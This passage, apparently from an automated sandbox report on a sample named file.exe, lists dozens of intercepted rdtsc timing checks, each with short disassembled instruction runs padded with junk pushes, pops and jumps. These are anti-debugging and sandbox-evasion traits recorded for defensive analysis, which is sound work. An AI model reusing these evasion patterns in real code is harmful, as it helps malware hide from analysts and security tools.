ecx 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C0F0 second address: 82C107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnl 00007F3D507EA970h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8B52 second address: 7D8B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8306AA second address: 8306C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA970h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8317B9 second address: 8317DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D50D0EC78h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8326CA second address: 8326CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8317DA second address: 8317F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D50D0EC79h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8343EE second address: 8343FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3D507EA966h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8326CF second address: 83275D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3D50D0EC68h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F3D50D0EC76h 0x00000029 mov ebx, esi 0x0000002b push dword ptr fs:[00000000h] 0x00000032 jmp 00007F3D50D0EC79h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jmp 00007F3D50D0EC6Fh 0x00000043 mov eax, dword ptr [ebp+122D08EDh] 0x00000049 mov bh, 6Eh 0x0000004b push FFFFFFFFh 0x0000004d push ecx 0x0000004e movsx ebx, bx 0x00000051 pop ebx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push edx 0x00000059 pop edx 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8343FA second address: 8343FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8343FE second address: 834402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8349B6 second address: 8349BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8349BE second address: 834A06 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 3DB58F0Eh 0x00000011 push 00000000h 0x00000013 or edi, 4117D899h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+1247040Ch], esi 0x00000021 xchg eax, esi 0x00000022 jmp 00007F3D50D0EC77h 0x00000027 push eax 0x00000028 jnl 00007F3D50D0EC74h 0x0000002e push eax 0x0000002f push edx 0x00000030 jp 00007F3D50D0EC66h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838A14 second address: 838A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA972h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D507EA96Bh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C0C4 second address: 83C0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C0C8 second address: 83C0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837BB3 second address: 837BC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838B4F second address: 838B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jnl 00007F3D507EA966h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C50 second address: 839C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C56 second address: 839C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F3D507EA966h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839C6A second address: 839C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D29 second address: 839D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D2E second address: 839D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839D34 second address: 839D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F18 second address: 844F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D50D0EC6Dh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F2C second address: 844F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCFA4 second address: 7CCFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3D50D0EC7Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F3D50D0EC73h 0x00000012 popad 0x00000013 jbe 00007F3D50D0ECA5h 0x00000019 jmp 00007F3D50D0EC79h 0x0000001e pushad 0x0000001f jmp 00007F3D50D0EC76h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCFFF second address: 7CD005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84492F second address: 844933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844A92 second address: 844AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D507EA96Bh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844AA4 second address: 844ADA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D50D0EC8Ch 0x00000008 jmp 00007F3D50D0EC70h 0x0000000d jmp 00007F3D50D0EC76h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F3D50D0EC66h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849829 second address: 84982E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F62A second address: 84F659 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3D50D0EC78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3D50D0EC71h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F659 second address: 84F663 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D507EA96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F663 second address: 84F68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D50D0EC77h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC6Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A47 second address: 7D3A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3A4E second address: 7D3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC6Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAAB second address: 84EAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAB0 second address: 84EAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAB5 second address: 84EACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EACE second address: 84EAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EAD2 second address: 84EAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D507EA975h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F04C second address: 84F06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F06C second address: 84F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA970h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F080 second address: 84F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F3D50D0EC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F091 second address: 84F0B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3D507EA974h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jno 00007F3D507EA966h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F0B5 second address: 84F0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4A2 second address: 84F4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4A6 second address: 84F4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3D50D0EC68h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4B8 second address: 84F4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8542C0 second address: 854318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Fh 0x00000007 js 00007F3D50D0EC68h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edx 0x00000013 jmp 00007F3D50D0EC6Bh 0x00000018 jmp 00007F3D50D0EC74h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3D50D0EC73h 0x00000025 jne 00007F3D50D0EC66h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854450 second address: 854459 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CB5 second address: 854CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CB9 second address: 854CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858476 second address: 85847E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85847E second address: 858490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CDE3 second address: 85CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F3D50D0EC7Fh 0x0000000d jmp 00007F3D50D0EC79h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE09 second address: 85CE1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D507EA968h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F3D507EA972h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE1F second address: 85CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3D50D0EC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE29 second address: 85CE3B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D507EA96Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE3B second address: 85CE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE3F second address: 85CE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC0F8 second address: 7DC0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC0FC second address: 7DC105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC105 second address: 7DC10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826A68 second address: 802317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push esi 0x00000007 jmp 00007F3D507EA972h 0x0000000c pop esi 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3D507EA968h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jc 00007F3D507EA976h 0x0000002e jmp 00007F3D507EA970h 0x00000033 call dword ptr [ebp+122D2706h] 0x00000039 push esi 0x0000003a push ebx 0x0000003b pushad 0x0000003c popad 0x0000003d pop ebx 0x0000003e pop esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jnp 00007F3D507EA968h 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827230 second address: 827236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8273D3 second address: 8273E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8273E1 second address: 827400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D50D0EC6Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827598 second address: 82759D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8278F9 second address: 827943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx edx, di 0x0000000d push 0000001Eh 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F3D50D0EC68h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dl, FBh 0x0000002b nop 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F3D50D0EC73h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827943 second address: 827964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F3D507EA972h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827594 second address: 827598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF24 second address: 85BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA974h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D507EA976h 0x00000011 jp 00007F3D507EA966h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF5B second address: 85BF68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF68 second address: 85BF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA96Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF77 second address: 85BF81 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D50D0EC66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF81 second address: 85BF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D507EA96Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF95 second address: 85BF9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF9F second address: 85BFB9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D507EA96Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F3D507EA966h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BFB9 second address: 85BFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C112 second address: 85C12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA976h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C2B9 second address: 85C2BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C474 second address: 85C478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C478 second address: 85C47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C982 second address: 85C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C986 second address: 85C98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C98A second address: 85C990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B58 second address: 862B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3D50D0EC7Dh 0x0000000c jmp 00007F3D50D0EC77h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B7B second address: 862B8B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D507EA968h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861590 second address: 86159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3D50D0EC66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86159C second address: 8615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8615A1 second address: 8615D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jnc 00007F3D50D0EC66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007F3D50D0EC73h 0x00000016 jo 00007F3D50D0EC66h 0x0000001c pop esi 0x0000001d pop edx 0x0000001e pop eax 0x0000001f jo 00007F3D50D0EC84h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
